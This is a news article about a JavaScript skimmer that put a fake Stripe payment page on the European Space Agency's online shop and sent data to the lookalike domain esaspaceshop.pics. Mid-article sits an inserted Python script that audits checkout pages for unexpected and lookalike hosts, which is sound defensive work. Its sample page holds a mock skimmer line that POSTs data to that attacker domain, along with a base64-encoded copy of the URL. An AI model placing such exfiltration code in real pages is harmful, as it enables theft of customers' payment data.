The European Space Agency’s (ESA) official online shop was the victim of a cyberattack.

Hackers injected a malicious JavaScript script that replaced the legitimate Stripe payment page with a counterfeit one during the checkout process.

ESA, with its €10 billion budget and mission to push the boundaries of space exploration, licenses its web store to sell branded merchandise. However, the shop is currently offline, displaying a message that it is “temporarily out of orbit.”

The breach was first identified by e-commerce security firm Sansec, which discovered the malicious script yesterday. The script, designed to steal customer information—including payment card data—was integrated at the final stage of purchases.

The hackers used a deceptive technique by registering a domain with a name identical to the ESA shop but with a different top-level domain (TLD). While ESA’s official store operates on “esaspaceshop.com,” the attackers used “esaspaceshop.pics” to exfiltrate data.


The malicious script, embedded within the ESA store’s source code, contained obfuscated HTML copied from the Stripe SDK to render a convincing but fraudulent payment page. The fake page appeared legitimate to customers because it was served directly from the ESA store’s own domain rather than from a third-party host.
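One defensive check a shop operator can run against a page like this is to audit the checkout HTML for external hosts that are neither the store itself nor an expected payment provider, and to flag lookalike domains that reuse the store's own name under a different TLD. The script below is an added example written for this article, not code from Sansec, Source Defense, ESA or the shop; it uses the domain names reported above (esaspaceshop.com, esaspaceshop.pics), an assumed allowlist of legitimate hosts (js.stripe.com, api.stripe.com), and a constructed sample page that stands in for an injected skimmer. It also decodes base64 string literals before scanning, since a plain URL regex misses endpoints that are hidden that way.

```python
import base64
import re

# Official store domain as reported in the article. The allowlist of expected
# third-party hosts is an assumption for this example (js.stripe.com and
# api.stripe.com are Stripe's real SDK/API hosts, but the set is ours).
OFFICIAL_DOMAIN = "esaspaceshop.com"
ALLOWED_HOSTS = {"esaspaceshop.com", "js.stripe.com", "api.stripe.com"}

# Matches the host part of absolute or protocol-relative URLs.
HOST_RE = re.compile(r"(?:https?:)?//([a-z0-9.-]+\.[a-z]{2,})", re.I)
# Matches quoted string literals that look like base64 (16+ alphabet chars).
B64_RE = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")

# Constructed sample checkout page: one legitimate Stripe SDK include, one
# inline script mimicking a skimmer (hostname both in clear and base64),
# and one unrelated external tracking pixel.
SAMPLE_HTML = """<html><body>
<script src="https://js.stripe.com/v3/"></script>
<script>
  var u = atob("aHR0cHM6Ly9lc2FzcGFjZXNob3AucGljcy9jb2xsZWN0");
  fetch("https://esaspaceshop.pics/collect", {method: "POST"});
</script>
<img src="//cdn.example-analytics.net/pixel.gif">
</body></html>"""


def registrable_parts(host):
    """Split 'www.example.com' into ('example', 'com').
    Naive: assumes a single-label public suffix, which is enough for
    .com vs .pics; use a public-suffix list for co.uk-style domains."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return (labels[0], "")
    return (labels[-2], labels[-1])


def is_lookalike(host, official=OFFICIAL_DOMAIN):
    """True if host reuses the official second-level label under another TLD."""
    h_sld, h_tld = registrable_parts(host)
    o_sld, o_tld = registrable_parts(official)
    return h_sld == o_sld and h_tld != o_tld


def decoded_literals(text):
    """Return the UTF-8 decodings of every base64-looking literal in text."""
    out = []
    for m in B64_RE.finditer(text):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("utf-8"))
        except Exception:  # not really base64, or not text: ignore
            continue
    return out


def extract_hosts(html):
    """All external hostnames referenced in the page, including those
    that only appear inside base64-encoded string literals."""
    corpus = html + "\n" + "\n".join(decoded_literals(html))
    return sorted({m.group(1).lower() for m in HOST_RE.finditer(corpus)})


def audit_page(html, allowed=ALLOWED_HOSTS, official=OFFICIAL_DOMAIN):
    """Return (host, reason) findings for hosts outside the allowlist."""
    findings = []
    for host in extract_hosts(html):
        if host in allowed or host.endswith("." + official):
            continue
        if is_lookalike(host, official):
            findings.append((host, "lookalike of official domain"))
        else:
            findings.append((host, "unexpected external host"))
    return findings


if __name__ == "__main__":
    for host, reason in audit_page(SAMPLE_HTML):
        print(f"{host}: {reason}")
```

Run periodically against the live checkout page (or in CI against the deployed template), the audit surfaces any new host the page talks to, and the lookalike rule gives the esaspaceshop.pics case a higher-priority label than an ordinary unknown host. The same allowlist is what a Content-Security-Policy `connect-src`/`form-action` directive should enforce in the browser, so that a skimmer cannot post card data anywhere the policy does not name.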

Sansec warned that the store’s integration with ESA systems could potentially compromise the agency’s employees as well. Source Defense Research, a web application security firm, corroborated Sansec’s findings and captured evidence of the fake payment page.

ESA’s Response

While the fake payment page is no longer active, the malicious script remains visible in the store’s source code. When reached for comment, ESA clarified that the compromised shop is not hosted on its infrastructure and that the agency does not manage its data. A simple WHOIS lookup confirmed this separation, as ESA’s main domain (esa.int) and the web store domain have distinct contact details.


(via: Bleepingcomputer)